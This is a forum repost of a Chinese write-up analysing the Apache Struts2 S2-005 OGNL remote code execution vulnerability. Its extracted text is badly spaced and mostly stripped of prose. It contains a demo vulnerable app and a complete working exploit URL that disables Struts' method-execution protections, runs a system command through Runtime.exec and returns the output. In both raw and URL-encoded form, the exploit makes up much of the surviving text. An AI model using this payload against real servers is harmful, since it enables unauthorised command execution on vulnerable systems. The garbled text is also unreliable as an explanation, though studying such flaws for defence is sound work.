搜索

[13621] 2019-01-06_Struts2-005远程代码执行漏洞分析

文档创建者:s7ckTeam
浏览次数:43
最后更新:2025-01-18
2019-01-06_Struts2-005远程代码执行漏洞分析 S t r u t s 2 - 0 0 5     F r e e B u f   2 0 1 9 - 0 1 - 0 6 h t t p s : / / c w i k i . a p a c h e . o r g / c o n f l u e n c e / d i s p l a y / W W / S 2 - 0 0 5 X W o r k   P a r a m e t e r I n t e r c e p t o r s   b y p a s s   a l l o w s   r e m o t e   c o m m a n d   e x e c u t i o n S t r u t s   2 . 0 . 0   -   S t r u t s   2 . 1 . 8 . 1 D e v e l o p e r s   s h o u l d   i m m e d i a t e l y   u p g r a d e   t o   S t r u t s   2 . 2 . 1   o r   r e a d   t h e   f o l l o w i n g   s o l u t i o n   i n s t r u c t i o n s c a r e f u l l y   f o r   a   c o n f i g u r a t i o n   c h a n g e   t o   m i t i g a t e   t h e   v u l n e r a b i l i t y S 2 - 0 0 5 S 2 - 0 0 3 S 2 - 0 0 3 S 2 - 0 0 5 S 2 - 0 0 3
  S t r u t s 2 . 0 . 1 1 . 2 h t t p : / / a r c h i v e . a p a c h e . o r g / d i s t / s t r u t s / b i n a r i e s / s t r u t s - 2 . 1 . 8 . 1 - a l l . z i p c o m m o n s - f i l e u p l o a d - 1 . 2 . 1 . j a r c o m m o n s - l o g g i n g - 1 . 0 . 4 . j a r f r e e m a r k e r - 2 . 3 . 1 5 . j a r o g n l - 2 . 7 . 3 . j a r s t r u t s 2 - c o r e - 2 . 1 . 8 . 1 . j a r x w o r k - 2 . 0 . 5 . j a r
i n d e x . j s p w e l c o m e . j s p s t r u t s . x m l c o m . d e m o . a c t i o n . L o g i n A c t i o n . j a v a < % @   p a g e   l a n g u a g e = " j a v a "   c o n t e n t T y p e = " t e x t / h t m l ;   c h a r s e t = U T F - 8 "         p a g e E n c o d i n g = " U T F - 8 " % > < % @   t a g l i b   p r e f i x = " s "   u r i = " / s t r u t s - t a g s "   % > < ! D O C T Y P E   h t m l   P U B L I C   " - / / W 3 C / / D T D   H T M L   4 . 0 1   T r a n s i t i o n a l / / E N "   " h t t p : / / w w w . w 3 . o r g / T R / h t m l 4 / l o o s e . d t d " > < h t m l > < h e a d > < m e t a   h t t p - e q u i v = " C o n t e n t - T y p e "   c o n t e n t = " t e x t / h t m l ;   c h a r s e t = U T F - 8 " > < t i t l e > S 2 - 0 0 5 < / t i t l e > < / h e a d > < b o d y > < h 2 > S 2 - 0 0 5   D e m o < / h 2 > < p > l i n k :   < a   h r e f = " h t t p s : / / c w i k i . a p a c h e . o r g / c o n f l u e n c e / d i s p l a y / W W / S 2 - 0 0 5 " > h t t p s : / / c w i k i . a p a c h e . o r g / c o n f l u e n c e / d i s p l a y / W W / S 2 - 0 0 5 < / a > < / p > < s : f o r m   a c t i o n = " l o g i n " >         < s : t e x t f i e l d   n a m e = " u s e r n a m e "   l a b e l = " u s e r n a m e "   / >         < s : t e x t f i e l d   n a m e = " p a s s w o r d "   l a b e l = " p a s s w o r d "   / >         < s : s u b m i t > < / s : s u b m i t > < / s : f o r m > < / b o d y > < / h t m l > < % @   p a g e   l a n g u a g e = " j a v a "   c o n t e n t T y p e = " t e x t / h t m l ;   c h a r s e t = U T F - 8 "         p a g e E n c o d i n g = " U T F - 8 " % > < % @   t a g l i b   p r e f i x = " s "   u r i = " / s t r u t s - t a g s "   % > < ! D O C T Y P E   h t m l   P U B L I C   " - / / W 3 C / / D T D   H T M L   4 . 0 1   T r a n s i t i o n a l / / E N "   " h t t p : / / w w w . w 3 . o r g / T R / h t m l 4 / l o o s e . d t d " > < h t m l > < h e a d > < m e t a   h t t p - e q u i v = " C o n t e n t - T y p e "   c o n t e n t = " t e x t / h t m l ;   c h a r s e t = U T F - 8 " > < t i t l e > S 2 - 0 0 5 < / t i t l e > < / h e a d > < b o d y > < p > H e l l o   < s : p r o p e r t y   v a l u e = " u s e r n a m e " > < / s : p r o p e r t y > < / p > < / b o d y > < / h t m l > < ? x m l   v e r s i o n = " 1 . 0 "   e n c o d i n g = " U T F - 8 "   ? > < ! D O C T Y P E   s t r u t s   P U B L I C         " - / / A p a c h e   S o f t w a r e   F o u n d a t i o n / / D T D   S t r u t s   C o n f i g u r a t i o n   2 . 0 / / E N "         " h t t p : / / s t r u t s . a p a c h e . o r g / d t d s / s t r u t s - 2 . 0 . d t d " > < s t r u t s >         < p a c k a g e   n a m e = " S 2 - 0 0 5 "   e x t e n d s = " s t r u t s - d e f a u l t " >                 < a c t i o n   n a m e = " l o g i n "   c l a s s = " c o m . d e m o . a c t i o n . L o g i n A c t i o n " >                         < r e s u l t   n a m e = " s u c c e s s " > w e l c o m e . j s p < / r e s u l t >                         < r e s u l t   n a m e = " e r r o r " > i n d e x . j s p < / r e s u l t >                 < / a c t i o n >         < / p a c k a g e > < / s t r u t s >
w e b . x m l S 2 - 0 0 3 O G N L f a l s e t r u e u n i c o d e P O C P O C T o m c a t 6 p a c k a g e   c o m . d e m o . a c t i o n ; i m p o r t   c o m . o p e n s y m p h o n y . x w o r k 2 . A c t i o n S u p p o r t ; p u b l i c   c l a s s   L o g i n A c t i o n   e x t e n d s   A c t i o n S u p p o r t   {         p r i v a t e   S t r i n g   u s e r n a m e   =   n u l l ;         p r i v a t e   S t r i n g   p a s s w o r d   =   n u l l ;         p u b l i c   S t r i n g   g e t U s e r n a m e ( )   {                 r e t u r n   t h i s . u s e r n a m e ;         }         p u b l i c   S t r i n g   g e t P a s s w o r d ( )   {                 r e t u r n   t h i s . p a s s w o r d ;         }         p u b l i c   v o i d   s e t U s e r n a m e ( S t r i n g   u s e r n a m e )   {                 t h i s . u s e r n a m e   =   u s e r n a m e ;         }         p u b l i c   v o i d   s e t P a s s w o r d ( S t r i n g   p a s s w o r d )   {                 t h i s . p a s s w o r d   =   p a s s w o r d ;         }         p u b l i c   S t r i n g   e x e c u t e ( )   t h r o w s   E x c e p t i o n   {                 i f   ( ( t h i s . u s e r n a m e . i s E m p t y ( ) )   | |   ( t h i s . p a s s w o r d . i s E m p t y ( ) ) )   {                         r e t u r n   " e r r o r " ;                 }                 i f   ( ( t h i s . u s e r n a m e . e q u a l s I g n o r e C a s e ( " a d m i n " ) )                                 & &   ( t h i s . p a s s w o r d . e q u a l s ( " a d m i n " ) ) )   {                         r e t u r n   " s u c c e s s " ;                 }                 r e t u r n   " e r r o r " ;         } } < ? x m l   v e r s i o n = " 1 . 0 "   e n c o d i n g = " U T F - 8 " ? > < w e b - a p p   x m l n s : x s i = " h t t p : / / w w w . w 3 . o r g / 2 0 0 1 / X M L S c h e m a - i n s t a n c e "   x m l n s = " h t t p : / / x m l n s . j c p . o r g / x m l / n s / j a v a e e "   x s i : s c h e m a L o c a t i o n = " h t t p : / / x m l n s . j c p . o r g / x m l / n s / j a v a e e   h t t p : / / x m l n s . j c p . o r g / x m l / n s / j a v a e e / w e b - a p p _ 3 _ 1 . x s d "   i d = " W e b A p p _ I D "   v e r s i o n = " 3 . 1 " >         < d i s p l a y - n a m e > S 2 - 0 0 5   E x a m p l e < / d i s p l a y - n a m e >         < f i l t e r >                 < f i l t e r - n a m e > s t r u t s 2 < / f i l t e r - n a m e >                 < f i l t e r - c l a s s > o r g . a p a c h e . s t r u t s 2 . d i s p a t c h e r . F i l t e r D i s p a t c h e r < / f i l t e r - c l a s s >         < / f i l t e r >         < f i l t e r - m a p p i n g >                 < f i l t e r - n a m e > s t r u t s 2 < / f i l t e r - n a m e >                 < u r l - p a t t e r n > / * < / u r l - p a t t e r n >         < / f i l t e r - m a p p i n g >         < w e l c o m e - f i l e - l i s t >                 < w e l c o m e - f i l e > i n d e x . j s p < / w e l c o m e - f i l e >         < / w e l c o m e - f i l e - l i s t > < / w e b - a p p > a l l o w S t a t i c M e t h o d A c c e s M e t h o d A c c e s s o r . d e n y M e t h o d E x e c u t i o n x w o r k . M e t h o d A c c e s s o r . d e n y M e t h o d E x e c u t i o n a l l o w S t a t i c M e t h o d A c c e s s u 0 0 2 3 #
S 2 - 0 0 3 O g n l V a l u e S t a c k O g n l V a l u e S t a c k o g n l U t i l . s e t V a l u e O g n l s e t V a l u e n a m e , x w o r k - c o r e - 2 . 1 . 1 6 . j a r ! c o m / o p e n s y m p h o n y / x w o r k 2 / i n t e r c e p t o r / P a r a m e t e r s I n t e r c e p t o r s e t P a r a m e t e r s x w o r k - c o r e - 2 . 1 . 1 6 . j a r ! c o m / o p e n s y m p h o n y / x w o r k 2 / o g n l / O g n l V a l u e S t a c k s e t V a l u e x w o r k - c o r e - 2 . 1 . 1 6 . j a r ! c o m / o p e n s y m p h o n y / x w o r k 2 / o g n l / O g n l U t i l s e t V a l u e c o m p i l e c o m p i l e p a r s e E x p r e s s i o n t o p L e v e l E x p r e s s i o n o g n l - 2 . 7 . 3 . j a r ! o g n l / O g n l P a r s e r e x p r e s s i o n ( ) u 0 0 2 3 #
r e t u r n h t t p : / / l o c a l h o s t : 1 1 1 1 / l o g i n . a c t i o n ? ( u 0 0 2 3 c o n t e x t [ x w o r k . M e t h o d A c c e s s o r . d e n y M e t h o d E x e c u t i o n ] u 0 0 3 d f a l s e ) ( b l a ) ( b l a ) & ( u 0 0 2 3 _ m e m b e r A c c e s s . a l l o w S t a t i c M e t h o d A c c e s s u 0 0 3 d t r u e ) ( b l a ) ( b l a ) & ( u 0 0 2 3 _ m e m b e r A c c e s s . e x c l u d e P r o p e r t i e s u 0 0 3 d @ j a v a . u t i l . C o l l e c t i o n s @ E M P T Y _ S E T ) ( k x l z x ) ( k x l z x ) & ( u 0 0 2 3 m y c m d u 0 0 3 d i f c o n f i g ) ( b l a ) ( b l a ) & ( u 0 0 2 3 m y r e t u 0 0 3 d @ j a v a . l a n g . R u n t i m e @ g e t R u n t i m e ( ) . e x e c ( u 0 0 2 3 m y c m d ) ) ( b l a ) ( b l a ) & ( A ) ( ( u 0 0 2 3 m y d a t u 0 0 3 d n e w 4 0 j a v a . i o . D a t a I n p u t S t r e a m ( u 0 0 2 3 m y r e t . g e t I n p u t S t r e a m ( ) ) ) ( b l a ) ) & ( B ) ( ( u 0 0 2 3 m y r e s u 0 0 3 d n e w 4 0 b y t e [ 5 1 0 2 0 ] ) ( b l a ) ) & ( C ) ( ( u 0 0 2 3 m y d a t . r e a d F u l l y ( u 0 0 2 3 m y r e s ) ) ( b l a ) ) & ( D ) ( ( u 0 0 2 3 m y s t r u 0 0 3 d n e w 4 0 j a v a . l a n g . S t r i n g ( u 0 0 2 3 m y r e s ) ) ( b l a ) ) & ( u 0 0 2 3 m y o u t u 0 0 3 d @ o r g . a p a c h e . s t r u t s 2 . S e r v l e t A c t i o n C o n t e x t @ g e t R e s p o n s e ( ) ) ( b l a ) ( b l a ) & ( E ) ( ( u 0 0 2 3 m y o u t . g e t W r i t e r ( ) . p r i n t l n ( u 0 0 2 3 m y s t r ) ) ( b l a ( b l a ) ( b l a ) & ( % 5 C u 0 0 2 3 _ m e m b e r A c c e s s . a l l o w S t a t i c M e t h o d A c c e s s % 5 C u 0 0 3 d t r u e ) ( b l a ) ( b l a ) & ( % 5 C u 0 0 2 3 _ m e m b e r A c c e s s . e x c l u d e P r o p e r t i e s % 5 C u 0 0 3 d @ j a v a . u t i l . C o l l e c t i o n s @ E M P T Y _ S E T ) ( k x l z x ) ( k x l z x ) & ( % 5 C u 0 0 2 3 m y c m d % 5 C u 0 0 3 d % 5 C i f c o n f i g % 5 C ) ( b l a ) ( b l a ) & ( % 5 C u 0 0 2 3 m y r e t % 5 C u 0 0 3 d @ j a v a . l a n g . R u n t i m e @ g e t R u n t i m e ( ) . e x e c ( % 5 C u 0 0 2 3 m y c m d ) ) ( b l a ) ( b l a ) & ( A ) ( ( % 5 C u 0 0 2 3 m y d a t % 5 C u 0 0 3 d n e w % 5 C 4 0 j a v a . i o . D a t a I n p u t S t r e a m ( % 5 C u 0 0 2 3 m y r e t . g e t I n p u t S t r e a m ( ) ) ) ( b l a ) ) & ( B ) ( ( % 5 C u 0 0 2 3 m y r e s % 5 C u 0 0 3 d n e w % 5 C 4 0 b y t e % 5 B 5 1 0 2 0 % 5 D ) ( b l a ) ) & ( C ) ( ( % 5 C u 0 0 2 3 m y d a t . r e a d F u l l y ( % 5 C u 0 0 2 3 m y r e s ) ) ( b l a ) ) & ( D ) ( ( % 5 C u 0 0 2 3 m y s t r % 5 C u 0 0 3 d n e w % 5 C 4 0 j a v a . l a n g . S t r i n g ( % 5 C u 0 0 2 3 m y r e s ) ) ( b l a ) ) & ( % 5 C u 0 0 2 3 m y o u t % 5 C u 0 0 3 d @ o r g . a p a c h e . s t r u t s 2 . S e r v l e t A c t i o n C o n t e x t @ g e t R e s p o n s e ( ) ) ( b l a ) ( b l a ) & ( E )
( ( % 5 C u 0 0 2 3 m y o u t . g e t W r i t e r ( ) . p r i n t l n ( % 5 C u 0 0 2 3 m y s t r ) ) ( b l a ) ) ) h t t p s : / / c w i k i . a p a c h e . o r g / c o n f l u e n c e / d i s p l a y / W W / S 2 - 0 0 5 h t t p s : / / b l o g . c s d n . n e t / u 0 1 1 7 2 1 5 0 1 / a r t i c l e / d e t a i l s / 4 1 6 2 6 9 5 9 h t t p s : / / x z . a l i y u n . c o m / t / 2 3 2 3 * F r e e B u f
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理